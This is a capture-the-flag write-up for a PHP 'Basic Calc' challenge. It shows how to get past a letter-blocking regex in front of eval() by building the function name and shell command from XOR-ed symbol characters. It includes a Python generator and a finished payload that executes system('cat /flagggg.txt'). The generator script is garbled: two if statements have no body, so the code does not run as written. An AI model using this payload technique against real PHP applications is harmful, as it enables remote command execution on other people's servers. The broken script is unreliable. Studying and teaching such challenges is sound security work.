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    Basic Calc


    Ever used calc based on php?


    First we open that web page

    enter image description here

    Look at the code, we need to bypass the condition that not match regex : [A-Za-z`] . Since eval — Evaluate a string as PHP code, we can inject a strings to become a code execution.

    To bypass input above, we use a XOR technique. For example :

    A XOR B = C
    B XOR C = D
    # we can try in php
    # For example:
     echo ('3'^'@'); # output = s
     echo ('9'^'@'); # output = y
     echo ('3'^'@'); # output = s
     echo ('4'^'@'); # output = t
     echo ('8'^']').('2'^'_'); # concat strings
     #ouput = system

    So how can we know that output? So we decide to create a python script to convert strings to XOR code or generate a xor code from strings.

    # except reqular expression : A-Za-z`
    # php print xor example : echo ("A"^"B")
    # system execute example:
    # <?php
    # echo ("system(ls -la)"); #it will execute as strings
    # echo ("system")("ls -la"); #it will execute as symbols #magic
    # ?>
    string_code = ['system','cat /flagggg.txt']
    obfuscated_code = ""
    charset = "1234567890!#$%&'()*+/^,-.:;<=>?@[]_{|}~"
    for code in string_code:
        obfuscated = ""
        for i in code:
            is_found_obfuscated = False
            for j in charset:
                for k in charset:
                    if ord(j)^ord(k) == ord(i):
                        is_found_obfuscated = True
                        obfuscated += ".('%s'^'%s')" % (j, k)
                        #print("XOR ="+chr(ord(j)^ord(k)))
                    if is_found_obfuscated:
                if is_found_obfuscated:
            if not is_found_obfuscated:
                obfuscated += ".'%s'" % i
        #print("(%s) = (%s)" % (code, obfuscated[1:]))
        obfuscated_code += "(%s)" % obfuscated[1:]
    print(''.join(["(\"%s\")" % i for i in string_code]) + '=' + obfuscated_code)

    Explain code above:

    1. suppose flagggg.txt location is at / directory. So we want php to execute code system("cat /flagggg.txt")
    2. list all the chars that not match the regex. For example:charset ="1234567890!#$%&'()*+/^,-.:;<=>?@[]_{|}~"
    3. Since echo ("system(ls -la)"); will execute as strings but echo ("system")("ls -la"); will execute as symbols, so we need to seperate them. In python script above we convert them to a list which we store in string_code variable.
    4. looping to find XOR code of each chars that we compared
    5. print all XOR code that equal the chars in each of index string_code variable
    ("system")("cat /flagggg.txt") = (('3'^'@').('9'^'@').('3'^'@').('4'^'@').('8'^']').('2'^'_'))(('8'^'[').('!'^'@').('4'^'@').('^'^'~').'/'.('8'^'^').('1'^']').('!'^'@').('8'^'_').('8'^'_').('8'^'_').('8'^'_').'.'.('4'^'@').('8'^'@').('4'^'@'))

    So now go back to the web page and try to input.

    enter image description here

    We got flag!

    Note: Since We already solved this task, we don't want to detail on finding the flag location, you can use this method and try to find by your own.